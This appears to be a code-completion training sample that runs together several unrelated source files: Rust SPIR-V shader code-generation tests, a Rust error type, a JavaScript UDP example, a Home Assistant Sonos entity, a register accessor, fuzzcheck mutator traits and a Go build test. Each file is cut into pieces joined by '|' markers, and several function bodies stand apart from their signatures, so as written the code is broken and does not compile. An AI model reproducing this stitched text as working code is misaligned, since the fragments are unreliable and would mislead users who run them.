Capability::Pipes => panic!(), // not supported
Capability::Groups => panic!(), // not supported
Capability::DeviceEnqueue => panic!(), // not supported
Capability::LiteralSampler => panic!(), // not supported
Capability::AtomicStorage => panic!(), // not supported
Capability::ImageRect => panic!(), // not supported
Capability::SampledRect => panic!(), // not supported
Capability::GenericPointer => panic!(), // not supported
Capability::SubgroupDispatch => panic!(), // not supported
Capability::NamedBarrier => panic!(), // not supported
Capability::PipeStorage => panic!(), // not supported
Capability::AtomicStorageOps => panic!(), // not supported
Capability::Float16ImageAMD => panic!(), // not supported
Capability::ShaderStereoViewNV => panic!(), // not supported
Capability::FragmentFullyCoveredEXT => panic!(), // not supported
Capability::SubgroupShuffleINTEL => panic!(), // not supported
Capability::SubgroupBufferBlockIOINTEL => panic!(), // not supported
Capability::SubgroupImageBlockIOINTEL => panic!(), // not supported
Capability::SubgroupImageMediaBlockIOINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationIntraINTEL => panic!(), // not supported
Capability::SubgroupAvcMotionEstimationChromaINTEL => panic!(), // not supported
Capability::FunctionPointersINTEL => panic!(), // not supported
Capability::IndirectReferencesINTEL => panic!(), // not supported
Capability::FPGAKernelAttributesINTEL => panic!(), // not supported
Capability::FPGALoopControlsINTEL => panic!(), // not supported
Capability::FPGAMemoryAttributesINTEL => panic!(), // not supported
Capability::FPGARegINTEL => panic!(), // not supported
Capability::UnstructuredLoopControlsINTEL => panic!(), // not supported
Capability::KernelAttributesINTEL => panic!(), // not supported
Capability::BlockingPipesINTEL => panic!(), // not supported
}
}
/// Returns the Vulkan device requirement for a SPIR-V storage class.
fn storage_class_requirement(storage_class: &StorageClass) -> &'static [DeviceRequirement] {
match *storage_class {
StorageClass::UniformConstant => &[],
StorageClass::Input => &[],
StorageClass::Uniform => &[],
StorageClass::Output => &[],
StorageClass::Workgroup => &[],
StorageClass::CrossWorkgroup => &[],
StorageClass::Private => &[],
StorageClass::Function => &[],
StorageClass::Generic => &[],
StorageClass::PushConstant => &[],
StorageClass::AtomicCounter => &[],
StorageClass::Image => &[],
StorageClass::StorageBuffer => &[DeviceRequirement::Extension(
"khr_storage_buffer_storage_class",
)],
StorageClass::CallableDataKHR => todo!(),
StorageClass::IncomingCallableDataKHR => todo!(),
StorageClass::RayPayloadKHR => todo!(),
StorageClass::HitAttributeKHR => todo!(),
StorageClass::IncomingRayPayloadKHR => todo!(),
StorageClass::ShaderRecordBufferKHR => todo!(),
StorageClass::PhysicalStorageBuffer => todo!(),
StorageClass::CodeSectionINTEL => todo!(),
}
}
enum DeviceRequirement {
Feature(&'static str),
Extension(&'static str),
Version(u32, u32),
}
#[cfg(test)]
mod tests {
use super::*;
use std::path::PathBuf;
#[cfg(not(target_os = "windows"))]
pub fn path_separator() -> &'static str |
#[cfg(target_os = "windows")]
pub fn path_separator() -> &'static str {
"\\"
}
fn convert_paths(root_path: &Path, paths: &[String]) -> Vec<String> {
paths
.iter()
.map(|p| path_to_str(root_path.join(p).as_path()).to_owned())
.collect()
}
#[test]
fn test_bad_alignment() {
// vec3/mat3/mat3x* are problematic in arrays since their rust
// representations don't have the same array stride as the SPIR-V
// ones. E.g. in a vec3[2], the second element starts on the 16th
// byte, but in a rust [[f32;3];2], the second element starts on the
// 12th byte. Since we can't generate code for these types, we should
// create an error instead of generating incorrect code.
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct MyStruct {
vec3 vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
let res = std::panic::catch_unwind(|| {
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new())
});
assert!(res.is_err());
}
#[test]
fn test_trivial_alignment() {
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct MyStruct {
vec4 vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new());
}
#[test]
fn test_wrap_alignment() {
// This is a workaround suggested in the case of test_bad_alignment,
// so we should make sure it works.
let includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (comp, _) = compile(
None,
&Path::new(""),
"
#version 450
struct Vec3Wrap {
vec3 v;
};
struct MyStruct {
Vec3Wrap vs[2];
};
layout(binding=0) uniform UBO {
MyStruct s;
};
void main() {}
",
ShaderKind::Vertex,
&includes,
&defines,
None,
None,
)
.unwrap();
let spirv = Spirv::new(comp.as_binary()).unwrap();
structs::write_structs("", &spirv, &TypesMeta::default(), &mut HashMap::new());
}
#[test]
fn test_include_resolution() {
let root_path = PathBuf::from(env!("CARGO_MANIFEST_DIR"));
let empty_includes: [PathBuf; 0] = [];
let defines: [(String, String); 0] = [];
let (_compile_relative, _) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include \"include_dir_a/target_a.glsl\"
#include \"include_dir_b/target_b.glsl\"
void main() {}
",
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
)
.expect("Cannot resolve include files");
let (_compile_include_paths, includes) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_a.glsl>
#include <target_b.glsl>
void main() {}
",
ShaderKind::Vertex,
&[
root_path.join("tests").join("include_dir_a"),
root_path.join("tests").join("include_dir_b"),
],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator()),
vec!["tests", "include_dir_b", "target_b.glsl"].join(path_separator()),
]
)
);
let (_compile_include_paths_with_relative, includes_with_relative) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_a.glsl>
#include <../include_dir_b/target_b.glsl>
void main() {}
",
ShaderKind::Vertex,
&[root_path.join("tests").join("include_dir_a")],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_with_relative,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator()),
vec!["tests", "include_dir_a", "../include_dir_b/target_b.glsl"]
.join(path_separator()),
]
)
);
let absolute_path = root_path
.join("tests")
.join("include_dir_a")
.join("target_a.glsl");
let absolute_path_str = absolute_path
.to_str()
.expect("Cannot run tests in a folder with non unicode characters");
let (_compile_absolute_path, includes_absolute_path) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
&format!(
"
#version 450
#include \"{}\"
void main() {{}}
",
absolute_path_str
),
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_absolute_path,
convert_paths(
&root_path,
&[vec!["tests", "include_dir_a", "target_a.glsl"].join(path_separator())]
)
);
let (_compile_recursive_, includes_recursive) = compile(
Some(String::from("tests/include_test.glsl")),
&root_path,
"
#version 450
#include <target_c.glsl>
void main() {}
",
ShaderKind::Vertex,
&[
root_path.join("tests").join("include_dir_b"),
root_path.join("tests").join("include_dir_c"),
],
&defines,
None,
None,
)
.expect("Cannot resolve include files");
assert_eq!(
includes_recursive,
convert_paths(
&root_path,
&[
vec!["tests", "include_dir_c", "target_c.glsl"].join(path_separator()),
vec!["tests", "include_dir_c", "../include_dir_a/target_a.glsl"]
.join(path_separator()),
vec!["tests", "include_dir_b", "target_b.glsl"].join(path_separator()),
]
)
);
}
#[test]
fn test_macros() {
let empty_includes: [PathBuf; 0] = [];
let defines = vec![("NAME1", ""), ("NAME2", "58")];
let no_defines: [(String, String); 0] = [];
let need_defines = "
#version 450
#if defined(NAME1) && NAME2 > 29
void main() {}
#endif
";
let compile_no_defines = compile(
None,
&Path::new(""),
need_defines,
ShaderKind::Vertex,
&empty_includes,
&no_defines,
None,
None,
);
assert!(compile_no_defines.is_err());
let compile_defines = compile(
None,
&Path::new(""),
need_defines,
ShaderKind::Vertex,
&empty_includes,
&defines,
None,
None,
);
compile_defines.expect("Setting shader macros did not work");
}
}
| {
"/"
} |
error.rs | //
// Copyright 2021 StarCrossTech
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use std::{error, fmt};
#[derive(Debug)]
pub enum Error {
IoError(std::io::Error),
NotEnoughBytes,
CppException(cxx::Exception),
ArchNotFound(String),
MissingArg(String),
}
impl From<std::io::Error> for Error {
fn from(err: std::io::Error) -> Self {
Self::IoError(err)
}
}
impl From<cxx::Exception> for Error {
fn from(err: cxx::Exception) -> Self {
Self::CppException(err)
}
}
impl fmt::Display for Error {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match self {
Self::IoError(e) => {
write!(f, "io error: {}", e)
}
Self::NotEnoughBytes => {
write!(f, "bytes not enough when decoding")
}
Self::CppException(e) => {
write!(f, "cpp exception: {}", e)
}
Self::ArchNotFound(s) => {
write!(f, "arch {} is not found in preset", s)
}
Self::MissingArg(s) => {
write!(f, "missing argument: {}", s)
}
}
}
}
impl error::Error for Error {
fn cause(&self) -> Option<&dyn error::Error> |
}
pub type Result<T> = std::result::Result<T, Error>;
| {
match *self {
Self::IoError(ref e) => Some(e),
Self::CppException(ref e) => Some(e),
_ => None,
}
} |
hello-world-example.js | // Creating Server
const { createServer } = require("../server")
var server = createServer(4444, function(packet,rinfo) {
console.log("Received from " + rinfo.address + ":" + rinfo.port + ": " + packet.title);
server.send(rinfo.address, rinfo.port, "Hello back", new Map().set("test1","a"));
server.send(rinfo.address, rinfo.port, "Hello back without Parameters");
});
// Creating Client
const { createClient } = require("../client")
| console.log("Received from Server: " + packet.title);
});
client.send("MyPacketWithParameters", new Map().set("test","a").set("test2","b"));
client.send("JustTitleNoParameters"); | var client = createClient("127.0.0.1", 4444, function(packet) { |
entity.py | """Entity representing a Sonos player."""
from __future__ import annotations
import logging
from pysonos.core import SoCo
import homeassistant.helpers.device_registry as dr
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity import DeviceInfo, Entity
from .const import (
DOMAIN,
SONOS_ENTITY_CREATED,
SONOS_ENTITY_UPDATE,
SONOS_STATE_UPDATED,
)
from .speaker import SonosSpeaker
_LOGGER = logging.getLogger(__name__)
class SonosEntity(Entity):
"""Representation of a Sonos entity."""
def __init__(self, speaker: SonosSpeaker) -> None:
"""Initialize a SonosEntity."""
self.speaker = speaker
async def async_added_to_hass(self) -> None:
"""Handle common setup when added to hass."""
await self.speaker.async_seen()
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"{SONOS_ENTITY_UPDATE}-{self.soco.uid}",
self.async_update, # pylint: disable=no-member
)
)
self.async_on_remove(
async_dispatcher_connect(
self.hass,
f"{SONOS_STATE_UPDATED}-{self.soco.uid}",
self.async_write_ha_state,
)
)
@property
def soco(self) -> SoCo:
|
@property
def device_info(self) -> DeviceInfo:
"""Return information about the device."""
return {
"identifiers": {(DOMAIN, self.soco.uid)},
"name": self.speaker.zone_name,
"model": self.speaker.model_name.replace("Sonos ", ""),
"sw_version": self.speaker.version,
"connections": {(dr.CONNECTION_NETWORK_MAC, self.speaker.mac_address)},
"manufacturer": "Sonos",
"suggested_area": self.speaker.zone_name,
}
@property
def available(self) -> bool:
"""Return whether this device is available."""
return self.speaker.available
@property
def should_poll(self) -> bool:
"""Return that we should not be polled (we handle that internally)."""
return False
class SonosSensorEntity(SonosEntity):
"""Representation of a Sonos sensor entity."""
async def async_added_to_hass(self) -> None:
"""Handle common setup when added to hass."""
await super().async_added_to_hass()
async_dispatcher_send(
self.hass, f"{SONOS_ENTITY_CREATED}-{self.soco.uid}", self.platform.domain
)
| """Return the speaker SoCo instance."""
return self.speaker.soco |
lim0_hi.rs | #[doc = "Reader of register LIM0_HI"]
pub type R = crate::R<u16, super::LIM0_HI>;
#[doc = "Writer for register LIM0_HI"]
pub type W = crate::W<u16, super::LIM0_HI>;
#[doc = "Register LIM0_HI `reset()`'s with value 0x0fff"]
impl crate::ResetValue for super::LIM0_HI {
type Type = u16;
#[inline(always)]
fn reset_value() -> Self::Type {
0x0fff
}
}
#[doc = "Reader of field `VALUE`"]
pub type VALUE_R = crate::R<u16, u16>;
#[doc = "Write proxy for field `VALUE`"]
pub struct VALUE_W<'a> {
w: &'a mut W,
}
impl<'a> VALUE_W<'a> {
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bits(self, value: u16) -> &'a mut W {
self.w.bits = (self.w.bits & !0x0fff) | ((value as u16) & 0x0fff);
self.w
}
}
#[doc = "Reader of field `EN`"]
pub type EN_R = crate::R<bool, bool>;
#[doc = "Write proxy for field `EN`"]
pub struct EN_W<'a> {
w: &'a mut W,
}
impl<'a> EN_W<'a> {
#[doc = r"Sets the field bit"]
#[inline(always)]
pub fn set_bit(self) -> &'a mut W {
self.bit(true)
}
#[doc = r"Clears the field bit"]
#[inline(always)]
pub fn clear_bit(self) -> &'a mut W {
self.bit(false)
}
#[doc = r"Writes raw bits to the field"]
#[inline(always)]
pub fn bit(self, value: bool) -> &'a mut W {
self.w.bits = (self.w.bits & !(0x01 << 15)) | (((value as u16) & 0x01) << 15);
self.w
}
}
impl R {
#[doc = "Bits 0:11 - High Limit for Channel 0"]
#[inline(always)]
pub fn value(&self) -> VALUE_R {
VALUE_R::new((self.bits & 0x0fff) as u16)
}
#[doc = "Bit 15 - Enable High Limit Comparison on Channel 0"]
#[inline(always)]
pub fn en(&self) -> EN_R {
EN_R::new(((self.bits >> 15) & 0x01) != 0) | #[doc = "Bits 0:11 - High Limit for Channel 0"]
#[inline(always)]
pub fn value(&mut self) -> VALUE_W {
VALUE_W { w: self }
}
#[doc = "Bit 15 - Enable High Limit Comparison on Channel 0"]
#[inline(always)]
pub fn en(&mut self) -> EN_W {
EN_W { w: self }
}
} | }
}
impl W { |
traits.rs | /*!
The fuzzcheck_traits crate defines the `Mutator` and `Serializer` traits
used by all fuzzcheck-related crates.
*/
use fuzzcheck_common::FuzzerEvent;
use std::fmt::Display;
use std::hash::Hash;
use std::path::PathBuf;
use crate::mutators::either::Either;
/**
A [Mutator] is an object capable of mutating a value for the purpose of
fuzz-testing.
For example, a mutator could change the value
`v1 = [1, 4, 2, 1]` to `v1' = [1, 5, 2, 1]`.
The idea is that if v1 is an “interesting” value to test, then v1' also
has a high chance of being “interesting” to test.
## Complexity
A mutator is also responsible for keeping track of the
[complexity](crate::Mutator::complexity) of a value. The complexity is,
roughly speaking, how large the value is.
For example, the complexity of a vector is the complexity of its length,
plus the sum of the complexities of its elements. So `vec![]` would have a
complexity of `1.0` and `vec![76]` would have a complexity of `10.0`: `2.0`
for its short length and `8.0` for the 8-bit integer “76”. But there is no
fixed rule for how to compute the complexity of a value, and it is up to you
to judge how “large” something is.
## Cache
In order to mutate values efficiently, the mutator is able to make use of a
per-value *cache*. The Cache contains information associated with the value
that will make it faster to compute its complexity or apply a mutation to
it. For a vector, its cache is its total complexity, along with a vector of
the cache of each of its element.
## MutationStep
The same values will be passed to the mutator many times, so that it is
mutated in many different ways. There are different strategies to choose
what mutation to apply to a value. The first one is to create a list of
mutation operations, and choose one to apply randomly from this list.
However, one may want to have better control over which mutation operation
is used. For example, if the value to be mutated is of type `Option<T>`,
then you may want to first mutate it to `None`, and then always mutate it
to another `Some(t)`. This is where `MutationStep` comes in. The mutation
step is a type you define to allow you to keep track of which mutation
operation has already been tried. This allows you to deterministically
apply mutations to a value such that better mutations are tried first, and
duplicate mutations are avoided.
It is not always possible to schedule mutations in order. For that reason,
we have two method: [random_mutate](crate::Mutator::random_mutate) executes
a random mutation, and [ordered_mutate](crate::Mutator::ordered_mutate) uses
the MutationStep to schedule mutations in order. The fuzzing engine only ever
uses `ordered_mutate` directly, but the former is sometimes necessary to
compose mutators together.
If you don't want to bother with ordered mutations, that is fine. In that
case, only implement `random_mutate` and call it from the `ordered_mutate`
method.
```ignore
fn random_mutate(&self, value: &mut Value, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64) {
// ...
}
fn ordered_mutate(&self, value: &mut Value, cache: &mut Self::Cache, step: &mut Self::MutationStep, max_cplx: f64) -> Option<(Self::UnmutateToken, f64)> {
Some(self.random_mutate(value, cache, max_cplx))
}
```
## Arbitrary
A mutator must also be able to generate new values from nothing. This is what
the [random_arbitrary](crate::Mutator::random_arbitrary) and
[ordered_arbitrary](crate::Mutator::ordered_arbitrary) methods are for. The
latter one is called by the fuzzer directly and uses an `ArbitraryStep` that
can be used to smartly generate more interesting values first and avoid
duplicates.
## Unmutate
Finally, it is important to note that values and caches are mutated
*in-place*. The fuzzer does not clone them before handing them to the
mutator. Therefore, the mutator also needs to know how to reverse each
mutation it performed. To do so, each mutation needs to return a token
describing how to reverse it. The [unmutate](crate::Mutator::unmutate)
method will later be called with that token to get the original value
and cache back.
For example, if the value is `[[1, 3], [5], [9, 8]]`, the mutator may
mutate it to `[[1, 3], [5], [9, 1, 8]]` and return the token:
`Element(2, Remove(1))`, which means that in order to reverse the
mutation, the element at index 2 has to be unmutated by removing
its element at index 1. In pseudocode:
```ignore
value = [[1, 3], [5], [9, 8]];
cache: c1 (ommitted from example)
step: s1 (ommitted from example)
let unmutate_token = self.mutate(&mut value, &mut cache, &mut step, max_cplx);
// value = [[1, 3], [5], [9, 1, 8]]
// token = Element(2, Remove(1))
// cache = c2
// step = s2
test(&value);
self.unmutate(&mut value, &mut cache, unmutate_token);
// value = [[1, 3], [5], [9, 8]]
// cache = c1 (back to original cache)
// step = s2 (step has not been reversed)
```
When a mutated value is deemed interesting by the fuzzing engine, the method
[validate_value](crate::Mutator::validate_value) is called on it in order to
get a new Cache and MutationStep for it. The same method is called when the
fuzzer reads values from a corpus to verify that they conform to the
mutator’s expectations. For example, a CharWithinRangeMutator
will check whether the character is within a certain range.
Note that in most cases, it is completely fine to never mutate a value’s cache,
since it is recomputed by [validate_value](crate::Mutator::validate_value) when
needed.
**/
pub trait Mutator<Value: Clone> {
/// Accompanies each value to help compute its complexity and mutate it efficiently.
type Cache: Clone;
/// Contains information about what mutations have already been tried.
type MutationStep: Clone;
/// Contains information about what arbitrary values have already been generated.
type ArbitraryStep: Clone;
/// Describes how to reverse a mutation
type UnmutateToken;
/// The first ArbitraryStep value to be passed to [ordered_arbitrary](crate::Mutator::ordered_arbitrary)
fn default_arbitrary_step(&self) -> Self::ArbitraryStep;
/// Verifies that the value conforms to the mutator’s expectations and, if it does,
/// returns the Cache and first MutationStep associated with that value.
fn validate_value(&self, value: &Value) -> Option<(Self::Cache, Self::MutationStep)>;
/// The maximum complexity that a Value can possibly have.
fn max_complexity(&self) -> f64;
/// The minimum complexity that a Value can possibly have.
fn min_complexity(&self) -> f64;
/// Computes the complexity of the value.
///
/// The returned value must be greater or equal than 0.
fn complexity(&self, value: &Value, cache: &Self::Cache) -> f64;
/// Generates an entirely new value based on the given `ArbitraryStep`.
///
/// The generated value should be smaller than the given `max_cplx`.
/// The return value is `None` if no more new value can be generated or if
/// it is not possible to stay within the given complexity. Otherwise, it
/// is the value itself and its complexity, which must be equal to
/// `self.complexity(value, cache)`
fn ordered_arbitrary(&self, step: &mut Self::ArbitraryStep, max_cplx: f64) -> Option<(Value, f64)>;
/// Generates an entirely new value.
/// The generated value should be smaller
/// than the given `max_cplx`. However, if that is not possible, then
/// it should return a value of the lowest possible complexity.
/// Returns the value itself and its complexity, which must be equal to
/// `self.complexity(value, cache)`
fn random_arbitrary(&self, max_cplx: f64) -> (Value, f64);
/// Mutates a value (and optionally its cache) based on the given
/// `MutationStep`.
/// The mutated value should be within the given
/// `max_cplx`. Returns `None` if it no longer possible to mutate
/// the value to a new state, or if it is not possible to keep it under
/// `max_cplx`. Otherwise, return the `UnmutateToken` that describes how to
/// undo the mutation as well as the new complexity of the value.
fn ordered_mutate(
&self,
value: &mut Value,
cache: &mut Self::Cache,
step: &mut Self::MutationStep,
max_cplx: f64,
) -> Option<(Self::UnmutateToken, f64)>;
/// Mutates a value (and optionally its cache). The mutated value should be
/// within the given `max_cplx`. But if that is not possible, then it
/// should mutate the value so that it has a minimal complexity. Returns
/// the `UnmutateToken` that describes how to undo the mutation as well as
/// the new complexity of the value.
fn random_mutate(&self, value: &mut Value, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64);
/// Undoes a mutation performed on the given value and cache, described by
/// the given `UnmutateToken`.
fn unmutate(&self, value: &mut Value, cache: &mut Self::Cache, t: Self::UnmutateToken);
}
/**
* A Serializer is used to encode and decode values into bytes.
*
* One possible implementation would be to use `serde` to implement
* both required functions. But we also want to be able to fuzz-test
* types that are not serializable with `serde`, which is why this
* Serializer trait exists.
*/
pub trait Serializer {
type Value;
fn is_utf8(&self) -> bool;
fn extension(&self) -> &str;
fn from_data(&self, data: &[u8]) -> Option<Self::Value>;
fn to_data(&self, value: &Self::Value) -> Vec<u8>;
}
pub trait MutatorWrapper {
type Wrapped;
fn wrapped_mutator(&self) -> &Self::Wrapped;
}
impl<T: Clone, W, M> Mutator<T> for M
where
M: MutatorWrapper<Wrapped = W>,
W: Mutator<T>,
{
type Cache = W::Cache;
type MutationStep = W::MutationStep;
type ArbitraryStep = W::ArbitraryStep;
type UnmutateToken = W::UnmutateToken;
#[no_coverage]
fn default_arbitrary_step(&self) -> Self::ArbitraryStep {
self.wrapped_mutator().default_arbitrary_step()
}
#[no_coverage]
fn validate_value(&self, value: &T) -> Option<(Self::Cache, Self::MutationStep)> {
self.wrapped | fn max_complexity(&self) -> f64 {
self.wrapped_mutator().max_complexity()
}
#[no_coverage]
fn min_complexity(&self) -> f64 {
self.wrapped_mutator().min_complexity()
}
#[no_coverage]
fn complexity(&self, value: &T, cache: &Self::Cache) -> f64 {
self.wrapped_mutator().complexity(value, cache)
}
#[no_coverage]
fn ordered_arbitrary(&self, step: &mut Self::ArbitraryStep, max_cplx: f64) -> Option<(T, f64)> {
self.wrapped_mutator().ordered_arbitrary(step, max_cplx)
}
#[no_coverage]
fn random_arbitrary(&self, max_cplx: f64) -> (T, f64) {
self.wrapped_mutator().random_arbitrary(max_cplx)
}
#[no_coverage]
fn ordered_mutate(
&self,
value: &mut T,
cache: &mut Self::Cache,
step: &mut Self::MutationStep,
max_cplx: f64,
) -> Option<(Self::UnmutateToken, f64)> {
self.wrapped_mutator().ordered_mutate(value, cache, step, max_cplx)
}
#[no_coverage]
fn random_mutate(&self, value: &mut T, cache: &mut Self::Cache, max_cplx: f64) -> (Self::UnmutateToken, f64) {
self.wrapped_mutator().random_mutate(value, cache, max_cplx)
}
#[no_coverage]
fn unmutate(&self, value: &mut T, cache: &mut Self::Cache, t: Self::UnmutateToken) {
self.wrapped_mutator().unmutate(value, cache, t)
}
}
impl<M> MutatorWrapper for Box<M> {
type Wrapped = M;
#[no_coverage]
fn wrapped_mutator(&self) -> &Self::Wrapped {
self.as_ref()
}
}
#[derive(Default, Clone, Copy)]
pub struct EmptyStats;
impl Display for EmptyStats {
#[no_coverage]
fn fmt(&self, _f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
Ok(())
}
}
#[derive(Debug)]
pub struct CorpusDelta<T, Idx> {
pub path: PathBuf,
pub add: Option<(T, Idx)>,
pub remove: Vec<Idx>,
}
impl<T, Idx> CorpusDelta<T, Idx> {
#[no_coverage]
pub fn convert<U>(self, convert_f: impl FnOnce(T) -> U) -> CorpusDelta<U, Idx> {
CorpusDelta {
path: self.path,
add: self.add.map(
#[no_coverage]
|(x, idx)| (convert_f(x), idx),
),
remove: self.remove,
}
}
#[no_coverage]
pub fn fuzzer_event(&self) -> FuzzerEvent {
if self.add.is_some() {
if self.remove.is_empty() {
FuzzerEvent::New
} else {
FuzzerEvent::Replace(self.remove.len())
}
} else {
if self.remove.is_empty() {
FuzzerEvent::None
} else {
FuzzerEvent::Remove(self.remove.len())
}
}
}
}
pub trait TestCase: Clone {
fn generation(&self) -> usize;
}
pub trait Sensor {
type ObservationHandler<'a>;
fn start_recording(&mut self);
fn stop_recording(&mut self);
fn iterate_over_observations(&mut self, handler: Self::ObservationHandler<'_>);
}
pub trait Pool {
type TestCase: TestCase;
type Index: Hash + Eq + Clone + Copy;
type Stats: Default + Display + Clone;
fn len(&self) -> usize;
fn stats(&self) -> Self::Stats;
fn get_random_index(&mut self) -> Option<Self::Index>;
fn get(&self, idx: Self::Index) -> &Self::TestCase;
fn get_mut(&mut self, idx: Self::Index) -> &mut Self::TestCase;
fn retrieve_after_processing(&mut self, idx: Self::Index, generation: usize) -> Option<&mut Self::TestCase>;
fn mark_test_case_as_dead_end(&mut self, idx: Self::Index);
fn minify(
&mut self,
target_len: usize,
event_handler: impl FnMut(CorpusDelta<&Self::TestCase, Self::Index>, Self::Stats) -> Result<(), std::io::Error>,
) -> Result<(), std::io::Error>;
}
pub trait CompatibleWithSensor<S: Sensor>: Pool {
fn process(
&mut self,
sensor: &mut S,
get_input_ref: Either<Self::Index, &Self::TestCase>,
clone_input: &impl Fn(&Self::TestCase) -> Self::TestCase,
complexity: f64,
event_handler: impl FnMut(CorpusDelta<&Self::TestCase, Self::Index>, Self::Stats) -> Result<(), std::io::Error>,
) -> Result<(), std::io::Error>;
}
| _mutator().validate_value(value)
}
#[no_coverage]
|
local_test.go | /*
* Copyright 2020 ZUP IT SERVICOS EM TECNOLOGIA E INOVACAO SA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package builder
import (
"errors"
"path/filepath"
"testing"
"github.com/ZupIT/ritchie-cli/pkg/formula"
"github.com/ZupIT/ritchie-cli/pkg/formula/repo"
"github.com/ZupIT/ritchie-cli/pkg/formula/tree"
"github.com/ZupIT/ritchie-cli/pkg/stream"
"github.com/ZupIT/ritchie-cli/pkg/stream/streams"
)
func | (t *testing.T) {
workspacePath := filepath.Join(tmpDir, "ritchie-formulas-test")
formulaPath := filepath.Join(tmpDir, "ritchie-formulas-test", "testing", "formula")
fileManager := stream.NewFileManager()
dirManager := stream.NewDirManager(fileManager)
defaultTreeManager := tree.NewGenerator(dirManager, fileManager)
repoProviders := formula.NewRepoProviders()
repoCreator := repo.NewCreator(ritHome, repoProviders, dirManager, fileManager)
repoLister := repo.NewLister(ritHome, fileManager)
repoWriter := repo.NewWriter(ritHome, fileManager)
repoListWrite := repo.NewListWriter(repoLister, repoWriter)
repoDeleter := repo.NewDeleter(ritHome, repoListWrite, dirManager)
repoDetail := repo.NewDetail(repoProviders)
repoListWriteCreator := repo.NewCreateWriteListDetailDeleter(repoLister, repoCreator, repoWriter, repoDetail, repoDeleter)
repoAdder := repo.NewAdder(ritHome, repoListWriteCreator, defaultTreeManager)
_ = dirManager.Remove(workspacePath)
_ = dirManager.Create(workspacePath)
zipFile := filepath.Join("..", "..", "..", "testdata", "ritchie-formulas-test.zip")
_ = streams.Unzip(zipFile, workspacePath)
type in struct {
formulaPath string
dirManager stream.DirCreateListCopyRemover
repo formula.RepositoryAdder
}
testes := []struct {
name string
in in
want error
}{
{
name: "success",
in: in{
formulaPath: formulaPath,
dirManager: dirManager,
repo: repoAdder,
},
want: nil,
},
{
name: "success build without build.sh",
in: in{
formulaPath: filepath.Join(tmpDir, "ritchie-formulas-test", "testing", "without-build-sh"),
dirManager: dirManager,
repo: repoAdder,
},
want: nil,
},
{
name: "create dir error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{createErr: errors.New("error to create dir")},
},
want: errors.New("error to create dir"),
},
{
name: "copy workspace dir error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{data: []string{"linux"}, copyErr: errors.New("error to copy dir")},
},
want: errors.New("error to copy dir"),
},
{
name: "dir remove error",
in: in{
formulaPath: formulaPath,
dirManager: dirManagerMock{data: []string{"commons"}, removeErr: errors.New("error to remove dir")},
repo: repoAdder,
},
want: errors.New("error to remove dir"),
},
{
name: "repo add error",
in: in{
formulaPath: formulaPath,
dirManager: dirManager,
repo: repoAdderMock{err: errors.New("error to add repo")},
},
want: errors.New("error to add repo"),
},
}
for _, tt := range testes {
t.Run(tt.name, func(t *testing.T) {
builderManager := NewBuildLocal(ritHome, tt.in.dirManager, tt.in.repo)
info := formula.BuildInfo{FormulaPath: tt.in.formulaPath, Workspace: formula.Workspace{Name: "repo", Dir: workspacePath}}
got := builderManager.Build(info)
if (tt.want != nil && got == nil) || got != nil && got.Error() != tt.want.Error() {
t.Errorf("Build(%s) got %v, want %v", tt.name, got, tt.want)
}
if tt.want == nil {
hasRitchieHome := dirManager.Exists(ritHome)
if !hasRitchieHome {
t.Errorf("Build(%s) did not create the Ritchie home directory", tt.name)
}
treeLocalFile := filepath.Join(ritHome, "repos", "local-repo", "tree.json")
hasTreeLocalFile := fileManager.Exists(treeLocalFile)
if !hasTreeLocalFile {
t.Errorf("Build(%s) did not copy the tree local file", tt.name)
}
